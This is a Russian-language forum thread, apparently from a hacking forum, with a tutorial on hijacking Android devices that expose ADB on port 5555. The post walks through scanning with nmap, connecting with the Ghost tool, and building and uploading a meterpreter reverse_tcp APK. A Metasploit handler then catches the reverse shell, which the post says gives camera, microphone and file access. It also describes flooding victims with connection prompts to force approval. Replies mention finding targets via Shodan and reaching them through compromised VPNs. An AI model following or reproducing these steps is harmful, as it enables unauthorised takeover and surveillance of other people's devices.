• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Призрак в устройстве. Взлом android устройства с помощью ADB уязвимости

Gufi

(L2) cache
Пользователь
Регистрация
12.07.2022
Сообщения
468
Реакции
819
Гарант сделки
3
Adb - клиент-серверное приложение, которое предоставляет доступ к работающему эмулятору или устройству. С его помощью можно копировать файлы, устанавливать скомпилированные программные пакеты и запускать консольные команды. Используя консоль, вы можете изменять настройки журнала и взаимодействовать с базами данных SQLite, которые хранятся на устройстве.
Включить функцию можно в настройках разработчика (отладка по usb).
По сути если на устройстве включена эта функция , то любой человек в сети может подключиться к вашему девайсу.
Служба adb висит на порте 5555.
В идеале взломать устройство на базе android kitkat (4.x) очень легко , главное чтобы на устройстве висела служба adb.
С устройствами с классическими прошивками на базе android 5.x > будет немного тяжелее , здесь будет нужно подтверждение на один клик , в помощь нам придет социалочка!

Приступим к роботе

Просканируем сеть на порты:

nmap 192.168.0.1/24

Видим устройство с открытым портом 5555
Снимок экрана 2023-02-12 133129.png

с этим ip адресом будем работать
Для эксплаутации мы используем инструмент Ghost

Скачиваем инструмент: скачать
Установка:
cd Ghost
python setup.py install

Запуск: sudo Ghost
Снимок экрана 2023-02-10 213916.png

Снимок экрана 2023-02-12 134412.png

Для подключения к устройству вводим:
connect <ip адрес устройства>

Готово. мы в устройстве!

Снимок экрана 2023-02-12 133937.png

чтобы использовать устройство вводим interact 0

Напишем help для получения сводки об всех командах!
Снимок экрана 2023-02-12 134341.png
https://xss.pro/attachments/51576/?hash=6fbf90e8cda1d51ca569259e02686a56
Теперь у нас есть доступ к устройству , для точки опоры в сети поставим meterpreter android payload!

Генерируем зараженный файл через msfvenom:
msfvenom -p android/meterpreter/reverse_tcp AutoRunScript = true LHOST= <ваш ip> Ip LPORT= 4444 R > payload.apk

Закидаем файл жертве через ghost:
upload <путь к payload.apk > \

Теперь перед запуском пейлоада откроем handler:
sudo msfconsole
use exploit/multi/handler
set payload/android/meterpreter_reverse_tcp
set lhost <ваш ip>
set lport 4444
run

Через ghost запускаем payload на устройстве

Готово! теперь в хендлере мы получили полный доступ к устройству , устройство теперь официально наше (доступ к камере , микрофону , доступ к файлам , и т.д.)

Социальная инженерия в атаке , подтверждение подключения
Как я говорил ранее , в версиях android 5.x > нужно будет подтвердить подключение к устройству , всего один клик но очень рисковый для юзера)
На некоторых прошивках такого не будет в том числе и на большинстве TV приставок (если на приставке android то ее тоже можно взломать)
Единственный способ заставить юзера нажать на кнопку подключения - это способ социальной инженерии спам/давка.
На практике мы просто будем посылать очень много запросов на подключение командой connect <ip устройства>
пока жертва не подтвердит , иначе изза множества окон она по сути ничего не сможет делать на устройстве
 
Последнее редактирование:
Было бы ещё лучше если это работало на 8-10.х
оно работает на всех версиях , только проблема в окошке которое вылазит после 5 андроида
 
оно работает на всех версиях , только проблема в окошке которое вылазит после 5 андроида
А да неправильно понял... Как будет выглядеть окошка подтверждение возможно ли подредачить?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
это даже не уязвимость вроде, а особенность adb. А так пробовал ее эксплуатировать. В шодане много андроид девайсов с публичными ипами
 
это даже не уязвимость вроде, а особенность adb. А так пробовал ее эксплуатировать. В шодане много андроид девайсов с публичными ипами
Но надо находиться в одной локальной сети с устройством?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Да
Теоретически, если бы вы получили удаленный доступ к сети другим способом (взломанный vpn, туннель SSH, обратный прокси и так далее), можно ли было бы тогда взломать устройства Android в сети?
 
Теоретически, если бы вы получили удаленный доступ к сети другим способом (взломанный vpn, туннель SSH, обратный прокси и так далее), можно ли было бы тогда взломать устройства Android в сети?
Думаю да , в случае с впном должно прокатить.
 
Также хочу добавить, что ADB нужно включать в настройках, чаще всего "из коробки" он выключен по дефолту и обычный юзер чаще всего ее не включает, особенно когда там написана страшная вещь как "Включить режим отладки для разработчиков" или похожий текст.
 
Также хочу добавить, что ADB нужно включать в настройках, чаще всего "из коробки" он выключен по дефолту и обычный юзер чаще всего ее не включает, особенно когда там написана страшная вещь как "Включить режим отладки для разработчиков" или похожий текст.
Вот и все, можно закривать тему)
 
сканирую сеть, но нет устройства с открытым ортом 5555 на тулефоне adb включён
Значит включен адб только для доступа по usb , на устройстве должен быть открыт adb с функцией отладки по сети.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх